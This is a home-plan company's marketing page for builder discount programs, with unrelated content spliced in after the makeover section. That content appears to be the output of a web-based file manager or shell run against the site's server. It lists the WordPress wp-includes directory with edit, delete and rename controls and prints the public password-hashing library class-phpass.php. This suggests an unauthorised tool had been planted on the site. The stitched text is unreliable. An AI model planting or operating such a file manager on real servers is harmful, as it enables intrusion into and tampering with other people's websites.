Builder-CentricSM Program
Our Builder-Centric℠ preferred builder program is a great way for builders to add more home designs to your portfolio at a lower cost as well as take advantage of extra savings.
we offer 2 programs
Gold and Platinum
Gold Program
Get 10% offǂ your plan service home plan license when purchased directly from Design Basics – single- or unlimited-build (excludes plan alterations and design or drafting of custom home plans). Plus, 10% off product purchases.
Platinum Program
Get 15% offǂ your plan service home plan license when purchased directly from Design Basics – single- or unlimited-build (excludes plan alterations and design or drafting of custom home plans). Plus, 15% off product purchases.
program comparison
Program Benefit Summary
Choose between our GOLD or PLATINUM Programs and watch your savings multiply! Get study plan sets for a fraction of the cost – use them to estimate building costs and review design options with customers before you buy. Also, choose one FREE upgrade with every order, such as an alternate foundation or reverse plan set.
Plan Service Home Plan License Purchase Discount (includes single- and unlimited-build licenses)
Product Purchase Discount
25% off Digital Home Plan Book
50% off your 1st New Trend Makeover
Concierge Service (We'll recommend plans for your next project)
Most Recent Home Plan Books FREE
$100 Study Plan Sets* for Estimating Purposes (up to five different plans per year)
One FREE Upgrade Per Plan License*† Purchased (from available upgrades; varies by plan)
Promotional License with Livability at a Glance™ Floor Plans (per plan licensed through program)
Contact us for more information.
Still looking for more?
Kickstart Your Neighborhood℠
Expand your portfolio without the risk: Choose 5 plans for estimating purposes and market the plans with color rendered artwork.
What You Will Get
Digital Home Plan Book
Customize your digital plan book when you:
Personalize your cover design
Add your logo and contact information
Choose the featured plans with full-color images
Your customized Digital Home Plan Book is delivered in a PDF format that you can add to your website, email to customers, or easily print on 8 1/2 x 11″ paper. Upgrade to a Digital Flip Book (see sample below) for an additional fee. *No additional discounts or offers apply.
$100 Study Plan Sets*
Sometimes you need to price out a home in order to get the sale, but you need to have the plans in order to get accurate bids. As a Builder-Centric member you can order estimating Study Sets* for up to five (5) different home plans per year for just $100 per study set! (Starting with the 6th plan, Study Sets are $250 each.)
*NOT FOR CONSTRUCTION PURPOSES. Applies to Design Basics, Design Basics/HBN, Scholz Design, Carmichael & Dame Designs, and Plan Pros, Inc. home plans. Full construction prints only (PDF or CAD files). Excludes custom designs. Does not apply to prior plan license purchases. Cannot be combined with any other promotion or discount.
One FREE Upgrade* per Plan Licensed
Alternate Exterior Wall Framing
Forward + Right Reading Reverse Plans
No-Step Entry Floor Plan
A No-Step Entry floor plan means there are no barriers to enter the home from the front door or the garage entry. This is helpful for occupants and guests with limited mobility.
*For each plan licensed, choose one available upgrade for that plan: Alternate foundation (basement, crawl, or slab); Alternate exterior wall framing (2x4" or 2x6"); Forward + Reverse plans; No-Step Entry floor plan; or a Materials list (not all upgrades available for all plans). Applies to Design Basics, LLC, Scholz Design, Carmichael & Dame Designs, and Plan Pros, Inc. home plans. Full construction prints only (PDF, sets, or CAD files). Excludes custom designs. Does not apply to prior plan license purchases. Cannot be combined with any other promotion or discount.
New Trend Makeover
Send it to us (CAD file, preferred), and we’ll update your plan with the latest design thought and must-have amenities! Increase marketability while staying with a home design you are familiar with – both in terms of construction and cost.
Flex room, rather than formal dining
Rear foyer with discrete laundry and drop zone
Expansive entertaining kitchen with large island and walk-in pantry
Expandable dining area for large gatherings
Oversized spa shower with no door in owner’s bath
Linen storage in owner’s bath
Compartmented hall bath with natural light
More storage in bedroom 2; more light for bedroom 3
Note: The makeover is a design concept; no changes to the construction drawings.
Example of new trend makeover
Current Dir: / var /www /designbasics /wp-includes /
[DIR] ID3 [ delete | rename ]
[DIR] IXR [ delete | rename ]
[DIR] PHPMailer [ delete | rename ]
[DIR] Requests [ delete | rename ]
[DIR] SimplePie [ delete | rename ]
[DIR] Text [ delete | rename ]
[FILE] admin-bar.php [ edit | delete | rename ]
[DIR] assets [ delete | rename ]
[FILE] atomlib.php [ edit | delete | rename ]
[FILE] author-template.php [ edit | delete | rename ]
[DIR] block-bindings [ delete | rename ]
[FILE] block-bindings.php [ edit | delete | rename ]
[FILE] block-editor.php [ edit | delete | rename ]
[FILE] block-i18n.json [ edit | delete | rename ]
[DIR] block-patterns [ delete | rename ]
[FILE] block-patterns.php [ edit | delete | rename ]
[DIR] block-supports [ delete | rename ]
[FILE] block-template-utils.php [ edit | delete | rename ]
[FILE] block-template.php [ edit | delete | rename ]
[DIR] blocks [ delete | rename ]
[FILE] blocks.php [ edit | delete | rename ]
[FILE] bookmark-template.php [ edit | delete | rename ]
[FILE] bookmark.php [ edit | delete | rename ]
[FILE] cache-compat.php [ edit | delete | rename ]
[FILE] cache.php [ edit | delete | rename ]
[FILE] canonical.php [ edit | delete | rename ]
[FILE] capabilities.php [ edit | delete | rename ]
[FILE] category-template.php [ edit | delete | rename ]
[FILE] category.php [ edit | delete | rename ]
[DIR] certificates [ delete | rename ]
[FILE] class-IXR.php [ edit | delete | rename ]
[FILE] class-avif-info.php [ edit | delete | rename ]
[FILE] class-feed.php [ edit | delete | rename ]
[FILE] class-http.php [ edit | delete | rename ]
[FILE] class-json.php [ edit | delete | rename ]
[FILE] class-oembed.php [ edit | delete | rename ]
[FILE] class-phpass.php [ edit | delete | rename ]
[FILE] class-phpmailer.php [ edit | delete | rename ]
[FILE] class-pop3.php [ edit | delete | rename ]
[FILE] class-requests.php [ edit | delete | rename ]
[FILE] class-simplepie.php [ edit | delete | rename ]
[FILE] class-smtp.php [ edit | delete | rename ]
[FILE] class-snoopy.php [ edit | delete | rename ]
[FILE] class-walker-category-dropdown.php [ edit | delete | rename ]
[FILE] class-walker-category.php [ edit | delete | rename ]
[FILE] class-walker-comment.php [ edit | delete | rename ]
[FILE] class-walker-nav-menu.php [ edit | delete | rename ]
[FILE] class-walker-page-dropdown.php [ edit | delete | rename ]
[FILE] class-walker-page.php [ edit | delete | rename ]
[FILE] class-wp-admin-bar.php [ edit | delete | rename ]
[FILE] class-wp-ajax-response.php [ edit | delete | rename ]
[FILE] class-wp-application-passwords.php [ edit | delete | rename ]
[FILE] class-wp-block-bindings-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-bindings-source.php [ edit | delete | rename ]
[FILE] class-wp-block-editor-context.php [ edit | delete | rename ]
[FILE] class-wp-block-list.php [ edit | delete | rename ]
[FILE] class-wp-block-parser-block.php [ edit | delete | rename ]
[FILE] class-wp-block-parser-frame.php [ edit | delete | rename ]
[FILE] class-wp-block-parser.php [ edit | delete | rename ]
[FILE] class-wp-block-pattern-categories-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-patterns-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-styles-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-supports.php [ edit | delete | rename ]
[FILE] class-wp-block-template.php [ edit | delete | rename ]
[FILE] class-wp-block-type-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-type.php [ edit | delete | rename ]
[FILE] class-wp-block.php [ edit | delete | rename ]
[FILE] class-wp-classic-to-block-menu-converter.php [ edit | delete | rename ]
[FILE] class-wp-comment-query.php [ edit | delete | rename ]
[FILE] class-wp-comment.php [ edit | delete | rename ]
[FILE] class-wp-customize-control.php [ edit | delete | rename ]
[FILE] class-wp-customize-manager.php [ edit | delete | rename ]
[FILE] class-wp-customize-nav-menus.php [ edit | delete | rename ]
[FILE] class-wp-customize-panel.php [ edit | delete | rename ]
[FILE] class-wp-customize-section.php [ edit | delete | rename ]
[FILE] class-wp-customize-setting.php [ edit | delete | rename ]
[FILE] class-wp-customize-widgets.php [ edit | delete | rename ]
[FILE] class-wp-date-query.php [ edit | delete | rename ]
[FILE] class-wp-dependencies.php [ edit | delete | rename ]
[FILE] class-wp-dependency.php [ edit | delete | rename ]
[FILE] class-wp-duotone.php [ edit | delete | rename ]
[FILE] class-wp-editor.php [ edit | delete | rename ]
[FILE] class-wp-embed.php [ edit | delete | rename ]
[FILE] class-wp-error.php [ edit | delete | rename ]
[FILE] class-wp-fatal-error-handler.php [ edit | delete | rename ]
[FILE] class-wp-feed-cache-transient.php [ edit | delete | rename ]
[FILE] class-wp-feed-cache.php [ edit | delete | rename ]
[FILE] class-wp-hook.php [ edit | delete | rename ]
[FILE] class-wp-http-cookie.php [ edit | delete | rename ]
[FILE] class-wp-http-curl.php [ edit | delete | rename ]
[FILE] class-wp-http-encoding.php [ edit | delete | rename ]
[FILE] class-wp-http-ixr-client.php [ edit | delete | rename ]
[FILE] class-wp-http-proxy.php [ edit | delete | rename ]
[FILE] class-wp-http-requests-hooks.php [ edit | delete | rename ]
[FILE] class-wp-http-requests-response.php [ edit | delete | rename ]
[FILE] class-wp-http-response.php [ edit | delete | rename ]
[FILE] class-wp-http-streams.php [ edit | delete | rename ]
[FILE] class-wp-http.php [ edit | delete | rename ]
[FILE] class-wp-image-editor-gd.php [ edit | delete | rename ]
[FILE] class-wp-image-editor-imagick.php [ edit | delete | rename ]
[FILE] class-wp-image-editor.php [ edit | delete | rename ]
[FILE] class-wp-list-util.php [ edit | delete | rename ]
[FILE] class-wp-locale-switcher.php [ edit | delete | rename ]
[FILE] class-wp-locale.php [ edit | delete | rename ]
[FILE] class-wp-matchesmapregex.php [ edit | delete | rename ]
[FILE] class-wp-meta-query.php [ edit | delete | rename ]
[FILE] class-wp-metadata-lazyloader.php [ edit | delete | rename ]
[FILE] class-wp-navigation-fallback.php [ edit | delete | rename ]
[FILE] class-wp-network-query.php [ edit | delete | rename ]
[FILE] class-wp-network.php [ edit | delete | rename ]
[FILE] class-wp-object-cache.php [ edit | delete | rename ]
[FILE] class-wp-oembed-controller.php [ edit | delete | rename ]
[FILE] class-wp-oembed.php [ edit | delete | rename ]
[FILE] class-wp-paused-extensions-storage.php [ edit | delete | rename ]
[FILE] class-wp-plugin-dependencies.php [ edit | delete | rename ]
[FILE] class-wp-post-type.php [ edit | delete | rename ]
[FILE] class-wp-post.php [ edit | delete | rename ]
[FILE] class-wp-query.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-cookie-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-email-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-key-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-link-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode.php [ edit | delete | rename ]
[FILE] class-wp-rewrite.php [ edit | delete | rename ]
[FILE] class-wp-role.php [ edit | delete | rename ]
[FILE] class-wp-roles.php [ edit | delete | rename ]
[FILE] class-wp-script-modules.php [ edit | delete | rename ]
[FILE] class-wp-scripts.php [ edit | delete | rename ]
[FILE] class-wp-session-tokens.php [ edit | delete | rename ]
[FILE] class-wp-simplepie-file.php [ edit | delete | rename ]
[FILE] class-wp-simplepie-sanitize-kses.php [ edit | delete | rename ]
[FILE] class-wp-site-query.php [ edit | delete | rename ]
[FILE] class-wp-site.php [ edit | delete | rename ]
[FILE] class-wp-styles.php [ edit | delete | rename ]
[FILE] class-wp-tax-query.php [ edit | delete | rename ]
[FILE] class-wp-taxonomy.php [ edit | delete | rename ]
[FILE] class-wp-term-query.php [ edit | delete | rename ]
[FILE] class-wp-term.php [ edit | delete | rename ]
[FILE] class-wp-text-diff-renderer-inline.php [ edit | delete | rename ]
[FILE] class-wp-text-diff-renderer-table.php [ edit | delete | rename ]
[FILE] class-wp-textdomain-registry.php [ edit | delete | rename ]
[FILE] class-wp-theme-json-data.php [ edit | delete | rename ]
[FILE] class-wp-theme-json-resolver.php [ edit | delete | rename ]
[FILE] class-wp-theme-json-schema.php [ edit | delete | rename ]
[FILE] class-wp-theme-json.php [ edit | delete | rename ]
[FILE] class-wp-theme.php [ edit | delete | rename ]
[FILE] class-wp-token-map.php [ edit | delete | rename ]
[FILE] class-wp-user-meta-session-tokens.php [ edit | delete | rename ]
[FILE] class-wp-user-query.php [ edit | delete | rename ]
[FILE] class-wp-user-request.php [ edit | delete | rename ]
[FILE] class-wp-user.php [ edit | delete | rename ]
[FILE] class-wp-walker.php [ edit | delete | rename ]
[FILE] class-wp-widget-factory.php [ edit | delete | rename ]
[FILE] class-wp-widget.php [ edit | delete | rename ]
[FILE] class-wp-xmlrpc-server.php [ edit | delete | rename ]
[FILE] class-wp.php [ edit | delete | rename ]
[FILE] class-wpdb.php [ edit | delete | rename ]
[FILE] class.wp-dependencies.php [ edit | delete | rename ]
[FILE] class.wp-scripts.php [ edit | delete | rename ]
[FILE] class.wp-styles.php [ edit | delete | rename ]
[FILE] comment-template.php [ edit | delete | rename ]
[FILE] comment.php [ edit | delete | rename ]
[FILE] compat.php [ edit | delete | rename ]
[FILE] cron.php [ edit | delete | rename ]
[DIR] css [ delete | rename ]
[DIR] customize [ delete | rename ]
[FILE] date.php [ edit | delete | rename ]
[FILE] default-constants.php [ edit | delete | rename ]
[FILE] default-filters.php [ edit | delete | rename ]
[FILE] default-widgets.php [ edit | delete | rename ]
[FILE] deprecated.php [ edit | delete | rename ]
[FILE] embed-template.php [ edit | delete | rename ]
[FILE] embed.php [ edit | delete | rename ]
[FILE] error-protection.php [ edit | delete | rename ]
[FILE] feed-atom-comments.php [ edit | delete | rename ]
[FILE] feed-atom.php [ edit | delete | rename ]
[FILE] feed-rdf.php [ edit | delete | rename ]
[FILE] feed-rss.php [ edit | delete | rename ]
[FILE] feed-rss2-comments.php [ edit | delete | rename ]
[FILE] feed-rss2.php [ edit | delete | rename ]
[FILE] feed.php [ edit | delete | rename ]
[DIR] fonts [ delete | rename ]
[FILE] fonts.php [ edit | delete | rename ]
[FILE] formatting.php [ edit | delete | rename ]
[FILE] functions.php [ edit | delete | rename ]
[FILE] functions.wp-scripts.php [ edit | delete | rename ]
[FILE] functions.wp-styles.php [ edit | delete | rename ]
[FILE] general-template.php [ edit | delete | rename ]
[FILE] global-styles-and-settings.php [ edit | delete | rename ]
[DIR] html-api [ delete | rename ]
[FILE] http.php [ edit | delete | rename ]
[FILE] https-detection.php [ edit | delete | rename ]
[FILE] https-migration.php [ edit | delete | rename ]
[DIR] images [ delete | rename ]
[DIR] interactivity-api [ delete | rename ]
[DIR] js [ delete | rename ]
[FILE] kses.php [ edit | delete | rename ]
[DIR] l10n [ delete | rename ]
[FILE] l10n.php [ edit | delete | rename ]
[FILE] link-template.php [ edit | delete | rename ]
[FILE] load.php [ edit | delete | rename ]
[FILE] locale.php [ edit | delete | rename ]
[FILE] media-template.php [ edit | delete | rename ]
[FILE] media.php [ edit | delete | rename ]
[FILE] meta.php [ edit | delete | rename ]
[FILE] ms-blogs.php [ edit | delete | rename ]
[FILE] ms-default-constants.php [ edit | delete | rename ]
[FILE] ms-default-filters.php [ edit | delete | rename ]
[FILE] ms-deprecated.php [ edit | delete | rename ]
[FILE] ms-files.php [ edit | delete | rename ]
[FILE] ms-functions.php [ edit | delete | rename ]
[FILE] ms-load.php [ edit | delete | rename ]
[FILE] ms-network.php [ edit | delete | rename ]
[FILE] ms-settings.php [ edit | delete | rename ]
[FILE] ms-site.php [ edit | delete | rename ]
[FILE] nav-menu-template.php [ edit | delete | rename ]
[FILE] nav-menu.php [ edit | delete | rename ]
[FILE] option.php [ edit | delete | rename ]
[DIR] php-compat [ delete | rename ]
[FILE] pluggable-deprecated.php [ edit | delete | rename ]
[FILE] pluggable.php [ edit | delete | rename ]
[FILE] plugin.php [ edit | delete | rename ]
[DIR] pomo [ delete | rename ]
[FILE] post-formats.php [ edit | delete | rename ]
[FILE] post-template.php [ edit | delete | rename ]
[FILE] post-thumbnail-template.php [ edit | delete | rename ]
[FILE] post.php [ edit | delete | rename ]
[FILE] query.php [ edit | delete | rename ]
[FILE] registration-functions.php [ edit | delete | rename ]
[FILE] registration.php [ edit | delete | rename ]
[DIR] rest-api [ delete | rename ]
[FILE] rest-api.php [ edit | delete | rename ]
[FILE] revision.php [ edit | delete | rename ]
[FILE] rewrite.php [ edit | delete | rename ]
[FILE] robots-template.php [ edit | delete | rename ]
[FILE] rss-functions.php [ edit | delete | rename ]
[FILE] rss.php [ edit | delete | rename ]
[FILE] script-loader.php [ edit | delete | rename ]
[FILE] script-modules.php [ edit | delete | rename ]
[FILE] session.php [ edit | delete | rename ]
[FILE] shortcodes.php [ edit | delete | rename ]
[DIR] sitemaps [ delete | rename ]
[FILE] sitemaps.php [ edit | delete | rename ]
[DIR] sodium_compat [ delete | rename ]
[FILE] spl-autoload-compat.php [ edit | delete | rename ]
[DIR] style-engine [ delete | rename ]
[FILE] style-engine.php [ edit | delete | rename ]
[FILE] taxonomy.php [ edit | delete | rename ]
[FILE] template-canvas.php [ edit | delete | rename ]
[FILE] template-loader.php [ edit | delete | rename ]
[FILE] template.php [ edit | delete | rename ]
[DIR] theme-compat [ delete | rename ]
[FILE] theme-i18n.json [ edit | delete | rename ]
[FILE] theme-previews.php [ edit | delete | rename ]
[FILE] theme-templates.php [ edit | delete | rename ]
[FILE] theme.json [ edit | delete | rename ]
[FILE] theme.php [ edit | delete | rename ]
[FILE] update.php [ edit | delete | rename ]
[FILE] user.php [ edit | delete | rename ]
[FILE] vars.php [ edit | delete | rename ]
[FILE] version.php [ edit | delete | rename ]
[DIR] widgets [ delete | rename ]
[FILE] widgets.php [ edit | delete | rename ]
[FILE] wp-db.php [ edit | delete | rename ]
[FILE] wp-diff.php [ edit | delete | rename ]
Viewing: /var/www/designbasics/wp-includes/class-phpass.php
<?php
/**
* Portable PHP password hashing framework.
* @package phpass
* @since 2.5.0
* @version 0.5 / WordPress
* @link https://www.openwall.com/phpass/
*/
#
# Portable PHP password hashing framework.
#
# Version 0.5 / WordPress.
#
# Written by Solar Designer <solar at openwall.com> in 2004-2006 and placed in
# the public domain. Revised in subsequent years, still public domain.
#
# There's absolutely no warranty.
#
# The homepage URL for this framework is:
#
# http://www.openwall.com/phpass/
#
# Please be sure to update the Version line if you edit this file in any way.
# It is suggested that you leave the main version number intact, but indicate
# your project name (after the slash) and add your own revision information.
#
# Please do not change the "private" password hashing method implemented in
# here, thereby making your hashes incompatible. However, if you must, please
# change the hash type identifier (the "$P$") to something different.
#
# Obviously, since this code is in the public domain, the above are not
# requirements (there can be none), but merely suggestions.
#
/**
* Portable PHP password hashing framework.
*
* @package phpass
* @version 0.5 / WordPress
* @link https://www.openwall.com/phpass/
* @since 2.5.0
*/
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;
function __construct($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
$this->random_state = microtime();
if (function_exists('getmypid'))
$this->random_state .= getmypid();
}
function PasswordHash($iteration_count_log2, $portable_hashes)
{
self::__construct($iteration_count_log2, $portable_hashes);
}
function get_random_bytes($count)
{
$output = '';
if (@is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .= md5($this->random_state, TRUE);
}
$output = substr($output, 0, $count);
}
return $output;
}
function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) === $output)
$output = '*1';
$id = substr($setting, 0, 3);
# We use "$P$", phpBB3 uses "$H$" for the same thing
if ($id !== '$P$' && $id !== '$H$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) !== 8)
return $output;
# We were kind of forced to use MD5 here since it's the only
# cryptographic primitive that was available in all versions
# of PHP in use. To implement our own low-level crypto in PHP
# would have resulted in much worse performance and
# consequently in lower iteration counts and hashes that are
# quicker to crack (by non-PHP code).
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
function gensalt_blowfish($input)
{
# This one needs to use a different order of characters and a
# different encoding scheme from the one in encode64() above.
# We care because the last character in our encoded string will
# only represent 2 bits. While two known implementations of
# bcrypt will happily accept and correct a salt string which
# has the 4 unused bits set to non-zero, we do not want to take
# chances and we also do not want to waste an additional byte
# of entropy.
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$output = '$2a$';
$output .= chr((int)(ord('0') + $this->iteration_count_log2 / 10));
$output .= chr((ord('0') + $this->iteration_count_log2 % 10));
$output .= '$';
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
function HashPassword($password)
{
if ( strlen( $password ) > 4096 ) {
return '*';
}
$random = '';
if (CRYPT_BLOWFISH === 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) === 60)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) === 34)
return $hash;
# Returning '*' on error is safe here, but would _not_ be safe
# in a crypt(3)-like function used _both_ for generating new
# hashes and for validating passwords against existing hashes.
return '*';
}
function CheckPassword($password, $stored_hash)
{
if ( strlen( $password ) > 4096 ) {
return false;
}
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] === '*')
$hash = crypt($password, $stored_hash);
# This is not constant-time. In order to keep the code simple,
# for timing safety we currently rely on the salts being
# unpredictable, which they are at least in the non-fallback
# cases (that is, when we use /dev/urandom and bcrypt).
return $hash === $stored_hash;
}
}
